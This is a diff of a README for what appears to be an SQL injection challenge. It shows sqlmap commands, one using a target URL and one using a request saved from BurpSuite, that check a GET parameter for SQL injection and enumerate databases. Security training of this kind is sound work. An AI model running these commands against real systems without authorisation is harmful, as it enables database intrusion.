Jexasa/SQLi-sqlmap-challenge/README.md

 ## Use sqlmap to enumerate the databases and to check if the GET parameter that is being passed is vulnerable to SQLi
    There are two ways to do that:
-   * First way:
    ```
       sqlmap -u <url> --dbs
              -u Target URL (e.g. "http://www.site.com/vuln.php?id=1")
              --dbs Enumerate the databases
    ```
-   * Second way:
+   * OR
-   Intercept the request with BurpSuite (or whatever you prefer) Save the request in a .txt file (because sqlmap works best with a .txt file)
+   #Intercept the request with BurpSuite (or whatever you prefer)
+   #Save the request in a .txt file (because sqlmap works best with a .txt file)
    ```
       sqlmap -u <url> -r <file_path.txt> --dbs
                       -r Specifies a file to read the get request instead of the url